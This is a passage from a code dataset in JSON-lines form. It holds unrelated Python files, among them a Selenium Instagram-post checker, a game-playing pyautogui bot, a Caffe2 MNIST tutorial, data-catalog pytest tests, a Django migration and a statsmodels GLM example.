print(len(post))\n # post1=driver.find_element_by_xpath(\"// section / main / div / div[3] / article / div[1] / div / div[1] / div[1] / a / div / div[1] / img\")\n # post2=driver.find_element_by_xpath(\"//section/main/div/div[3]/article/div[1]/div/div[1]/div[2]/a/div/div[1]/img\")\n # post3 = driver.find_element_by_xpath(\"//section/main/div/div[3]/article/div[1]/div/div[1]/div[3]/a/div/div[1]/img\")\n # print(post1.get_attribute(\"alt\"))\n # print(post2.get_attribute(\"alt\"))\n # print(post3.get_attribute(\"alt\"))\n # print(name_of_article)\n # if (post1.get_attribute(\"alt\").find(name_of_article)!=-1)|(post2.get_attribute(\"alt\").find(name_of_article)!=-1)|(post3.get_attribute(\"alt\").find(name_of_article)!=-1):\n # successful_post=True\n\n # if (probably_posted==True)&(counter_of_posts'+str(new_amount_of_posts))\n\n for j in range(9):\n xpath_str = \"// section / main / div / div[3] / article / div[1] / div / div[{0}] / div[{1}] / a / div / div[1] / img\".format(\n str((j) // 3 + 1), str((j) % 3 + 1))\n post.append(driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\")) #[\n # :driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\").find(\"\\n\")])\n print(post[j+9])\n if post[j+9].find(description) != -1: successful_post = True\n\n if (post[9].find(description)==-1)|(len(post[9])==0):\n for l in range(8):\n if post[l+10]==post[l]: successful_post=True\n else:\n successful_post=False\n break\n\n\n\n# class LoginMailBox(unittest.TestCase):\n\n\ndef setUp():\n chrome_options = webdriver.ChromeOptions()\n # Add the mobile emulation to the chrome options variable\n #chrome_options.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n chrome_options.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"en-US\"})\n #chrome_options.add_argument('headless')\n # self.driver\\\n\n driv = webdriver.Chrome(executable_path='./chromedriver', chrome_options=chrome_options)\n return driv\n\n\n\n\ndef test_user_login_in_mail_box(dr):\n driver = dr\n global successful_post\n global attempt\n #WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time())))\n try:\n enter_to_instagram(driver)\n except Exception as msg:\n print(\"Error_of instagram\")\n print(msg)\n attempt+=1\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time())))\n #driver.close()\n driver.quit()\n\ndef tear_down(self):\n self.driver.quit()\n\ndef begin_of_driver(image_link, name, text, hashtag, number,high_text,link):\n print(\"begin of driver\")\n global successful_post\n global attempt\n #global probably_posted\n define_variables(name, text, hashtag, number,link)\n attempt=1\n while(successful_post!=True):\n test_user_login_in_mail_box(setUp())\n print(\"Attempt #\"+str(attempt))\n print(str(successful_post))\n if (attempt>=8): break\n if_post=successful_post\n successful_post=False\n return if_post","sub_path":"facebook_post.py","file_name":"facebook_post.py","file_ext":"py","file_size_in_byte":15046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424229216","text":"from PIL import ImageGrab, ImageOps # requires Pillow, numpy, PyAutoGUI and windows OS for ImageGrab and ImageOps\nfrom numpy import * # run the game at http://www.trex-game.skipser.com/ for reference in the same window \nimport pyautogui # ie have this window on the right end and the game on the left end\nimport time\n\n\nDinosaur = (171, 394)\nrestart_button = (340, 390)\n\n\ndef restart():\n 
pyautogui.click(restart_button)\n\n\ndef jump():\n pyautogui.keyDown('space')\n time.sleep(0.05)\n pyautogui.keyUp('space')\n\n\ndef grab():\n global dist\n box = (187, 394, 214, 415)\n image = ImageGrab.grab(box)\n grayscale = ImageOps.grayscale(image)\n dist = array(grayscale.getcolors())\n \n\n\ndef main():\n while True:\n grab()\n if dist.sum() != 814:\n jump()\n\n\nrestart()\nmain()","sub_path":"Challenge-1/3. game.py","file_name":"3. game.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449690326","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 14 22:13:56 2019\n\n@author: nebelgrau\n\"\"\"\n\n# Modulo\n\nnumbers = []\nfor _ in range(10):\n numbers.append(int(input())%42)\n\nprint(len(set(numbers)))","sub_path":"Modulo.py","file_name":"Modulo.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91550105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# request_action.py\n# \n# Copyright 2018 Francesco Antoniazzi \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n# DO NOT DELETE OR MOVE. THIS FILE IS USED BY wotMonitor.py\n\nimport sys\n\nfrom sepy.Sepa import Sepa as Engine\nfrom sepy import utils\n\nfrom cocktail.Action import *\nfrom cocktail.DataSchema import DataSchema\n\nfrom datetime import datetime\nfrom time import sleep\nimport argparse\n\ndef custom_handler(added,removed):\n print(\"\\n**************************************************************\")\n print(\"ADDED: {}\".format(added))\n print(\"REMOVED: {}\".format(removed))\n print(\"**************************************************************\\n\")\n\ndef main(args):\n sepa = Engine( ip = args[\"ip\"],\n http_port = args[\"query_port\"],\n ws_port = args[\"sub_port\"],\n security = {\"secure\": args[\"security\"], \n \"tokenURI\": args[\"token_uri\"], \n \"registerURI\": args[\"registration_uri\"]})\n \n # Building an inferred action...\n action = Action.buildFromQuery(sepa,utils.uriFormat(args[\"Action-URI\"]))\n if args[\"custom_handler\"] is None:\n if ((action.type is AType.IO_ACTION) or (action.type is AType.OUTPUT_ACTION)):\n # if the action is \"IO\" or \"OUTPUT\", we have to notify when an output is received.\n # Here's the handler!\n def handler(a,r):\n print(\"\\n**************************************\")\n print(\"Request action output handler! 
\")\n print(\"Added: {}\".format(a))\n print(\"Removed: {}\".format(r))\n print(\"**************************************\\n\")\n else:\n # Otherwise no handler is needed\n handler = None\n else:\n # This script allows to give as cmd-line argument a filepath to a file\n # containing a method called \"handler\" which will be used as handler\n import importlib.util as iutil\n spec = iutil.spec_from_file_location(\"module.name\",args[\"custom_handler\"])\n module = iutil.module_from_spec(spec)\n spec.loader.exec_module(module)\n handler = module.handler\n \n # receiving inputs from command line...\n bindings = {\"action\": action.uri,\n \"newAInstance\": utils.uriFormat(\"http://AInstance_\"+str(datetime.now()).replace(\" \",\"T\").replace(\":\",\"_\")+\"Z\"),\n \"newAuthor\": utils.uriFormat(\"http://MonitorPython\")}\n if ((action.type is AType.IO_ACTION) or (action.type is AType.INPUT_ACTION)):\n print(\"Please give input according to the following dataschema: \")\n print(\"DS info:\")\n dss = DataSchema.discover(sepa,ds=action.bindings[\"ids\"],nice_output=True)[\"results\"][\"bindings\"]\n \n if len(dss)>1:\n # map each available DataSchema uri to its format string\n queried_format = {}\n for ds in dss:\n queried_format[ds[\"ds\"][\"value\"]] = ds[\"fs\"][\"value\"]\n chosen_ds = input(\">> Please insert the DataSchema Uri chosen: \")\n bindings[\"newIDS\"] = utils.uriFormat(chosen_ds)\n chosen_format = queried_format[chosen_ds]\n else:\n bindings[\"newIDS\"] = utils.uriFormat(dss[0][\"ds\"][\"value\"])\n chosen_format = dss[0][\"fs\"][\"value\"]\n bindings[\"newIValue\"] = input(\"({}) Insert input in {} format > \".format(bindings[\"newIDS\"],chosen_format))\n bindings[\"newIData\"] = utils.uriFormat(\"http://IDATA_\"+str(datetime.now()).replace(\" \",\"T\").replace(\":\",\"_\")+\"Z\")\n \n # actual action request \n action.newRequest( bindings,\n confirm_handler=lambda a,r: print(\"\\nConfirmation handler:\\na: {}\\nr: {}\".format(a,r)),\n completion_handler=lambda a,r: print(\"\\nCompletion handler:\\na: {}\\nr: {}\".format(a,r)),\n output_handler=handler)\n try:\n # Wait forever...\n print(\"CTRL-C to exit...\")\n while True:\n sleep(10)\n except KeyboardInterrupt:\n print(\"Bye Bye!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"WoT Action requestor\")\n parser.add_argument(\"-ip\", default=\"localhost\", help=\"Sepa ip\")\n parser.add_argument(\"-query_port\", default=8000, help=\"Sepa query/update port\")\n parser.add_argument(\"-sub_port\", default=9000, help=\"Sepa subscription port\")\n parser.add_argument(\"-token_uri\", default=None, help=\"Sepa token uri\")\n parser.add_argument(\"-registration_uri\", default=None, help=\"Sepa registration uri\")\n parser.add_argument(\"-custom_handler\", default=None, help=\"Action output handler location. 
The .py file must have a method inside called 'handler'\")\n parser.add_argument(\"Action-URI\",help=\"Uri of the action to be requested\")\n arguments = vars(parser.parse_args())\n if ((arguments[\"token_uri\"] is not None) and (arguments[\"registration_uri\"] is not None)):\n arguments[\"security\"] = True\n else:\n arguments[\"security\"] = False\n sys.exit(main(arguments))\n","sub_path":"tools/request_action.py","file_name":"request_action.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"358026029","text":"#!usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n\"\"\"\n@author:chaowei\n@file: image_preprocessing_example.py\n@time: 2019/09/17\n\"\"\"\n\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport shutil\nimport caffe2.python.predictor.predictor_exporter as pe\n\nfrom caffe2.python import core, model_helper, net_drawer, workspace, brew\n\ncore.GlobalInit(['caffe2', '--caffe2_log_level=0'])\nprint(\"Necessities imported!\")\n\n\ndef DownloadResource(url, path):\n \"\"\"\n This section preps your image and test set in a lmdb database;\n Downloads resources from s3 by url and unzips them to the provided path\n :param url:\n :param path:\n :return:\n \"\"\"\n import requests, zipfile, StringIO\n print(\"Downloading...{} to {}\".format(url, path))\n r = requests.get(url, stream=True)\n z = zipfile.ZipFile(StringIO.StringIO(r.content))\n z.extractall(path)\n print(\"Completed download and extraction.\")\n\n\ncurrent_folder = os.path.join(os.path.expanduser('./data'), 'caffe2_notebooks')\ndata_folder = os.path.join(current_folder, 'tutorial_data', 'mnist')\nroot_folder = os.path.join(current_folder, 'tutorial_files', 'tutorial_mnist')\ndb_missing = False\n\nif not os.path.exists(data_folder):\n os.makedirs(data_folder)\n print(\"Your data folder was not found!! This was generated: {}\".format(data_folder))\n\n# Look for existing database: lmdb\nif os.path.exists(os.path.join(data_folder,\"mnist-train-nchw-lmdb\")):\n print(\"lmdb train db found!\")\nelse:\n db_missing = True\n\nif os.path.exists(os.path.join(data_folder,\"mnist-test-nchw-lmdb\")):\n print(\"lmdb test db found!\")\nelse:\n db_missing = True\n\n# attempt the download of the db if either was missing\nif db_missing:\n print(\"one or both of the MNIST lmbd dbs not found!!\")\n db_url = \"http://download.caffe2.ai/databases/mnist-lmdb.zip\"\n try:\n DownloadResource(db_url, data_folder)\n except Exception as ex:\n print(\"Failed to download dataset. 
Please download it manually from {}\".format(db_url))\n print(\"Unzip it and place the two database folders here: {}\".format(data_folder))\n raise ex # once the exception is raised, the code after it will not execute\nif os.path.exists(root_folder):\n print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n shutil.rmtree(root_folder) # recursively delete the directory and everything inside it\n\nos.makedirs(root_folder)\nworkspace.ResetWorkspace(root_folder)\n\nprint(\"training data folder:\" + data_folder)\nprint(\"workspace root folder:\" + root_folder)\n\n\ndef AddInput(model, batch_size, db, db_type):\n # load the data\n data_uint8, label = model.TensorProtosDBInput(\n [], [\"data_uint8\", \"label\"], batch_size=batch_size,\n db=db, db_type=db_type)\n # cast the data to float\n data = model.Cast(data_uint8, \"data\", to=core.DataType.FLOAT)\n # scale data from [0,255] down to [0,1]\n data = model.Scale(data, data, scale=float(1./256))\n # don't need the gradient for the backward pass\n data = model.StopGradient(data, data)\n return data, label\n\n\ndef AddLeNetModel(model, data):\n '''\n This part is the standard LeNet model: from data to the softmax prediction.\n\n For each convolutional layer we specify dim_in - number of input channels\n and dim_out - number of output channels. Also each Conv and MaxPool layer changes the\n image size. For example, kernel of size 5 reduces each side of an image by 4.\n\n While when we have kernel and stride sizes equal 2 in a MaxPool layer, it divides\n each side in half.\n '''\n # Image size: 28 x 28 -> 24 x 24\n conv1 = brew.conv(model, data, 'conv1', dim_in=1, dim_out=20, kernel=5) # stride =1 ?\n # Image size: 24 x 24 -> 12 x 12\n pool1 = brew.max_pool(model, conv1, 'pool1', kernel=2, stride=2)\n # Image size: 12 x 12 -> 8 x 8\n conv2 = brew.conv(model, pool1, 'conv2', dim_in=20, dim_out=100, kernel=5)\n # Image size: 8 x 8 -> 4 x 4\n pool2 = brew.max_pool(model, conv2, 'pool2', kernel=2, stride=2)\n # 100 * 4 * 4 stands for dim_out from previous layer multiplied by the image size\n fc3 = brew.fc(model, pool2, 'fc3', dim_in=100 * 4 * 4, dim_out=500)\n\n # fc3 = brew.relu(model, fc3, fc3)\n relu = brew.relu(model, fc3, fc3)\n pred = brew.fc(model, relu, 'pred', 500, 10)\n softmax = brew.softmax(model, pred, 'softmax')\n return softmax\n\n\ndef AddAccuracy(model, softmax, label):\n \"\"\"Adds an accuracy op to the model\"\"\"\n accuracy = brew.accuracy(model, [softmax, label], \"accuracy\")\n return accuracy\n\n\ndef AddTrainingOperators(model, softmax, label):\n # NOTE: in the original snippet the statement below sat at module level, where\n # 'model', 'softmax' and 'label' are undefined; it is wrapped in a function here\n # so the module can be imported and run.\n xent = model.LabelCrossEntropy([softmax, label], 'xent')\n return xent\n\n\n\n\n\nif __name__ == '__main__':\n\n\n pass","sub_path":"normalTest/image_preprocessing_example.py","file_name":"image_preprocessing_example.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"187434768","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0006_remove_toon__damage'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Weapon',\n fields=[\n ('name', models.CharField(max_length=30, serialize=False, primary_key=True)),\n ('num_dice', models.IntegerField(default=1)),\n ('dice_sides', models.IntegerField(default=3)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='toon',\n name='id',\n ),\n migrations.AlterField(\n model_name='toon',\n name='name',\n field=models.CharField(max_length=30, serialize=False, primary_key=True),\n 
preserve_default=True,\n ),\n ]\n","sub_path":"api/migrations/0007_auto_20141106_1506.py","file_name":"0007_auto_20141106_1506.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"553528768","text":"import datetime\n\nimport pytest\nfrom dbcat.catalog.models import ColumnLineage, Job, JobExecution, JobExecutionStatus\n\n\ndef test_get_sources(rest_catalog):\n sources = list(rest_catalog.get_sources())\n assert len(sources) == 1\n source = sources[0]\n assert source.name == \"test\"\n assert source.id is not None\n\n\ndef test_get_schemata(rest_catalog):\n schemata = list(rest_catalog.get_schemata())\n assert len(schemata) == 1\n assert schemata[0].name == \"default\"\n assert schemata[0].id is not None\n\n\ndef test_get_tables(rest_catalog):\n num = 0\n for table in rest_catalog.get_tables():\n assert table.id is not None\n assert table.name is not None\n num += 1\n assert num == 8\n\n\ndef test_get_columns(rest_catalog):\n num = 0\n for column in rest_catalog.get_columns():\n assert column.id is not None\n assert column.name is not None\n assert column.data_type is not None\n assert column.sort_order is not None\n num += 1\n\n assert num == 32\n\n\ndef test_get_source_by_id(rest_catalog):\n source = rest_catalog.get_source_by_id(1)\n assert source.name == \"test\"\n assert source.fqdn == \"test\"\n assert source.source_type == \"json\"\n\n\ndef test_get_schema_by_id(rest_catalog):\n schema = rest_catalog.get_schema_by_id(1)\n assert schema.name == \"default\"\n assert schema.fqdn == [\"test\", \"default\"]\n\n\ndef test_get_table_by_id(rest_catalog):\n table = rest_catalog.get_table_by_id(1)\n assert table.name == \"pagecounts\"\n assert table.fqdn == [\"test\", \"default\", \"pagecounts\"]\n\n\ndef test_get_column_by_id(rest_catalog):\n column = rest_catalog.get_column_by_id(1)\n assert column.name == \"group\"\n assert column.fqdn == [\"test\", \"default\", \"pagecounts\", \"group\"]\n\n\ndef test_get_source_by_name(rest_catalog):\n sources = list(rest_catalog.get_source_by_name(\"test\"))\n assert len(sources) == 1\n source = sources[0]\n assert source.name == \"test\"\n assert source.id is not None\n\n\ndef test_get_schema_by_name(rest_catalog):\n schemata = list(rest_catalog.get_schema_by_name(\"default\"))\n assert len(schemata) == 1\n assert schemata[0].name == \"default\"\n assert schemata[0].id is not None\n\n\ndef test_get_table_by_name(rest_catalog):\n num = 0\n for table in rest_catalog.get_table_by_name(\"normalized_pagecounts\"):\n assert table.id is not None\n assert table.name == \"normalized_pagecounts\"\n num += 1\n assert num == 1\n\n\ndef test_get_column_by_name(rest_catalog):\n num = 0\n for column in rest_catalog.get_column_by_name(\"bytes_sent\"):\n assert column.id is not None\n assert column.name is not None\n # assert column.type is not None\n assert column.sort_order is not None\n num += 1\n\n assert num == 2\n\n\ndef test_add_source_pg(rest_catalog):\n data = {\n \"name\": \"pg\",\n \"source_type\": \"postgres\",\n \"database\": \"db_database\",\n \"username\": \"db_user\",\n \"password\": \"db_password\",\n \"port\": \"db_port\",\n \"uri\": \"db_uri\",\n }\n\n pg_connection = rest_catalog.add_source(**data)\n assert pg_connection.name == \"pg\"\n assert pg_connection.source_type == \"postgres\"\n assert pg_connection.database == \"db_database\"\n assert pg_connection.username == \"db_user\"\n assert pg_connection.password == \"db_password\"\n assert 
pg_connection.port == \"db_port\"\n assert pg_connection.uri == \"db_uri\"\n\n\ndef test_add_source_mysql(rest_catalog):\n data = {\n \"name\": \"mys\",\n \"source_type\": \"mysql\",\n \"database\": \"db_database\",\n \"username\": \"db_user\",\n \"password\": \"db_password\",\n \"port\": \"db_port\",\n \"uri\": \"db_uri\",\n }\n\n mysql_conn = rest_catalog.add_source(**data)\n\n assert mysql_conn.name == \"mys\"\n assert mysql_conn.source_type == \"mysql\"\n assert mysql_conn.database == \"db_database\"\n assert mysql_conn.username == \"db_user\"\n assert mysql_conn.password == \"db_password\"\n assert mysql_conn.port == \"db_port\"\n assert mysql_conn.uri == \"db_uri\"\n\n\ndef test_add_source_bq(rest_catalog):\n bq_conn = rest_catalog.add_source(\n name=\"bq\",\n source_type=\"bigquery\",\n key_path=\"db_key_path\",\n project_credentials=\"db_creds\",\n project_id=\"db_project_id\",\n )\n assert bq_conn.name == \"bq\"\n assert bq_conn.source_type == \"bigquery\"\n assert bq_conn.key_path == \"db_key_path\"\n assert bq_conn.project_credentials == \"db_creds\"\n assert bq_conn.project_id == \"db_project_id\"\n\n\ndef test_add_source_glue(rest_catalog):\n glue_conn = rest_catalog.add_source(name=\"gl\", source_type=\"glue\")\n assert glue_conn.name == \"gl\"\n assert glue_conn.source_type == \"glue\"\n\n\ndef test_add_source_snowflake(rest_catalog):\n sf_conn = rest_catalog.add_source(\n name=\"sf\",\n source_type=\"snowflake\",\n database=\"db_database\",\n username=\"db_user\",\n password=\"db_password\",\n account=\"db_account\",\n role=\"db_role\",\n warehouse=\"db_warehouse\",\n )\n assert sf_conn.name == \"sf\"\n assert sf_conn.source_type == \"snowflake\"\n assert sf_conn.database == \"db_database\"\n assert sf_conn.username == \"db_user\"\n assert sf_conn.password == \"db_password\"\n assert sf_conn.account == \"db_account\"\n assert sf_conn.role == \"db_role\"\n assert sf_conn.warehouse == \"db_warehouse\"\n\n\ndef load_edges(catalog, expected_edges, job_execution_id):\n column_edge_ids = []\n for edge in expected_edges:\n source = catalog.get_column(\n database_name=edge[0][0],\n schema_name=edge[0][1],\n table_name=edge[0][2],\n column_name=edge[0][3],\n )\n\n target = catalog.get_column(\n database_name=edge[1][0],\n schema_name=edge[1][1],\n table_name=edge[1][2],\n column_name=edge[1][3],\n )\n\n added_edge = catalog.add_column_lineage(source, target, job_execution_id, {})\n\n column_edge_ids.append(added_edge.id)\n return column_edge_ids\n\n\n@pytest.fixture(scope=\"module\")\ndef load_page_lookup_nonredirect_edges(save_catalog):\n catalog = save_catalog\n\n expected_edges = [\n (\n (\"test\", \"default\", \"page\", \"page_id\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"redirect_id\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_id\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"page_id\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_title\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"redirect_title\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_title\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"true_title\"),\n ),\n (\n (\"test\", \"default\", \"page\", \"page_latest\"),\n (\"test\", \"default\", \"page_lookup_nonredirect\", \"page_version\"),\n ),\n ]\n\n job = catalog.add_job(\n \"insert_page_lookup_nonredirect\",\n {\"sql\": \"insert into page_lookup_nonredirect select from page\"},\n )\n e1 = catalog.add_job_execution(\n job=job,\n started_at=datetime.datetime.combine(\n 
datetime.date(2021, 4, 1), datetime.time(1, 0)\n ),\n ended_at=datetime.datetime.combine(\n datetime.date(2021, 4, 1), datetime.time(1, 15)\n ),\n status=JobExecutionStatus.SUCCESS,\n )\n\n executions = [e1.id]\n name = job.name\n\n print(\"Inserted job {}\".format(name))\n print(\"Inserted executions {}\".format(\",\".join(str(v) for v in executions)))\n\n column_edge_ids = load_edges(catalog, expected_edges, executions[0])\n print(\"Inserted edges {}\".format(\",\".join(str(v) for v in column_edge_ids)))\n\n yield catalog, job, expected_edges\n\n session = catalog.scoped_session\n session.query(ColumnLineage).filter(ColumnLineage.id.in_(column_edge_ids)).delete(\n synchronize_session=False\n )\n print(\"DELETED edges {}\".format(\",\".join(str(v) for v in column_edge_ids)))\n session.commit()\n\n session.query(JobExecution).filter(JobExecution.id.in_(executions)).delete(\n synchronize_session=False\n )\n print(\"DELETED executions {}\".format(\",\".join(str(v) for v in executions)))\n session.commit()\n\n session.query(Job).filter(Job.name == name).delete(synchronize_session=False)\n print(\"DELETED job {}\".format(name))\n session.commit()\n\n\ndef test_api_main(graph_sdk, load_page_lookup_nonredirect_edges):\n catalog, job, expected_edges = load_page_lookup_nonredirect_edges\n graph = graph_sdk.get([job.id])\n assert len(graph[\"edges\"]) == 10\n assert len(graph[\"nodes\"]) == 15\n\n\ndef test_parser(rest_catalog, parser_sdk, graph_sdk, save_catalog):\n data = {\n \"name\": \"LOAD page_lookup\",\n \"query\": \"INSERT INTO page_lookup SELECT plr.redirect_id, plr.redirect_title, plr.true_title, plr.page_id, \"\n \"plr.page_version FROM page_lookup_redirect plr\",\n }\n\n job_execution = parser_sdk.parse(**data)\n assert job_execution is not None\n\n graph = graph_sdk.get([job_execution.job_id])\n\n assert len(graph[\"edges\"]) == 10\n assert len(graph[\"nodes\"]) == 15\n\n column_lineages = rest_catalog.get_column_lineage([job_execution.job_id])\n assert (len(column_lineages)) == 10\n","sub_path":"test/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"425028471","text":"import torch\nimport numpy as np\n\nfor subset in ['train', 'val', 'test']:\n print('Processing '+subset)\n prefix = '/remote/bones/user/public/vbalacha/bart_cnndm_preprocessing/cnn-dailymail/cnn_dm_test/' + subset+'.source-target.'\n sent_id_dataset = []\n sent_sizes = []\n with open(prefix + 'source.sentids', 'r', encoding='utf-8') as f:\n print(prefix + 'source.sentids')\n count = 0\n for line in f:\n if count % 1000 == 0:\n print('Processed '+str(count)+' examples')\n data = line.strip('\\n').split(\" \")\n data = list(map(int, data))\n data.append(data[-1])\n no_sents = data[-1]+1\n no_words = len(data)\n data = torch.LongTensor(data)\n one_hot_data = np.zeros((no_sents, no_words))\n for id in range(no_sents):\n one_hot_data[id, data.eq(id)] = 1\n sent_id_dataset.append(torch.from_numpy(one_hot_data))\n sent_sizes.append(no_words)\n save_obj = {'sent_id_dataset': sent_id_dataset, 'sent_sizes': sent_sizes}\n save_filename = prefix + 'source.sentids.pt'\n print('Saving to : '+save_filename)\n torch.save(save_obj, save_filename)\n","sub_path":"examples/structsum/preprocess_sentids.py","file_name":"preprocess_sentids.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"318797588","text":"\n\n#calss header\nclass _BICYCLING():\n\tdef __init__(self,): \n\t\tself.name = \"BICYCLING\"\n\t\tself.definitions = [u'riding a bicycle or relating to riding bicycles: ', u'used to refer to a royal family with an informal personal style, especially the royal family of the Netherlands or Sweden : ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_bicycling.py","file_name":"_bicycling.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216319915","text":"from venezia.network.entry import NodeEntry\n\nentry = NodeEntry(\n\tip = '',\n\tport = 1052,\n\tip_index = '',\n\tip_backup = '',\n\tdirectory_key_private = '',\n\tdirectory_key_public = ''\n\t)\nentry.settup()\n\nwhile True:\n\t\n\t\tsleep(0.01) #stop the cpu from constantly running at 100% cpu\n\t\t#keep the program running to test the listener\n","sub_path":"docs/examples/test_entry.py","file_name":"test_entry.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"255391196","text":"from threading import Thread\nimport pika\n\nfrom krk_meetings.exchanges import Exchange\nfrom krk_meetings.rabbitmq.RmqHelper import RmqHelper\n\n\nclass RmqProducer(RmqHelper):\n def __init__(self, exchange: Exchange):\n super().__init__(exchange)\n self.heartbeat_thread = self.data_consumer_thread = Thread(target=self.set_heartbeat_scheduler, args=[])\n if self.exchange.type:\n self.channel.exchange_declare(exchange=self.exchange.name, exchange_type=self.exchange.type)\n else:\n self.channel.exchange_declare(exchange=self.exchange.name)\n\n def start(self):\n self.heartbeat_thread.start()\n\n\n","sub_path":"backend/krk_meetings/rabbitmq/RmqProducer.py","file_name":"RmqProducer.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"162575502","text":"\nfrom PyQt4 import QtCore, QtGui\n\n\nclass MyDoubleSpinBox(QtGui.QDoubleSpinBox):\n '''\n A custom QDoubleSpinBox that adds a custom signal to send its value\n only when editing is finished\n '''\n editingValueFinished = QtCore.pyqtSignal(float) # emitted by the modified doublespinbox\n\n def __init__(self, parent = None):\n super(MyDoubleSpinBox, self).__init__(parent)\n self.editingFinished.connect( self.__handleEditingFinished)\n self.valueChanged.connect(self.__handleValueChanged)\n self.__before = 0\n\n def __handleValueChanged(self, aValue):\n if not self.hasFocus():\n self.__before = aValue\n\n def __handleEditingFinished(self):\n\n before, after = self.__before, self.value()\n if before != after:\n self.__before = after\n self.editingValueFinished.emit(after)\n","sub_path":"HyperCal/GUIInspector/MyDoubleSpinBox.py","file_name":"MyDoubleSpinBox.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"6904384","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Test the Generalized Linear Model \n# Reference: https://qiita.com/ground0state/items/38123b70c152253befe4\n\nimport matplotlib.pyplot as plt\nimport matplotlib as 
mpl\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n# Load data\nboston = load_boston()\ndf = pd.DataFrame(boston.data, columns=boston.feature_names)\ndf['PRICE'] = boston.target\ndisplay(df.head(10))\n\n# Split data\nX = df.drop('PRICE', axis=1)\ny = df['PRICE']\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size =0.8)\n\n# Create train data\ndata = pd.concat([X_train, y_train], axis=1)\n\n# Create linear predictor\nformula = \"PRICE ~ 1 + INDUS + CHAS + RM + RAD\"\n\n# Chose link function\nlink = sm.genmod.families.links.log\n\n# Chose distribution\nfamily = sm.families.Poisson(link=link)\n\n# Fit model\nmodel = smf.glm(formula=formula, data=data, family=family )\nresult = model.fit() \ndisplay(result.summary())\n\n# Evaluate AIC\nprint(result.aic)\n\n# Predict\ny_pred = result.predict(X_test)\ndf_test = pd.concat([X_test, y_test.rename(\"ACTUAL\"), y_pred.rename(\"PREDICT\")], axis=1).reset_index(drop = True)\ndisplay(df_test.head(10))\n\n# Caluclate Accuracy\ndf_test[\"AE\"] = np.abs(df_test[\"ACTUAL\"] - df_test[\"PREDICT\"])\ndisplay(df_test[\"AE\"].mean())\n\n# Another model (Use all valiables)\n# Or use follow code\nX_train.const = sm.add_constant(X_train)\nmodel2 = sm.GLM(y_train, X_train.const, family=sm.families.Poisson())\nresult2 = model2.fit() \ndisplay(result2.summary())\n\n# Evaluate AIC\nresult2.aic\n\n# 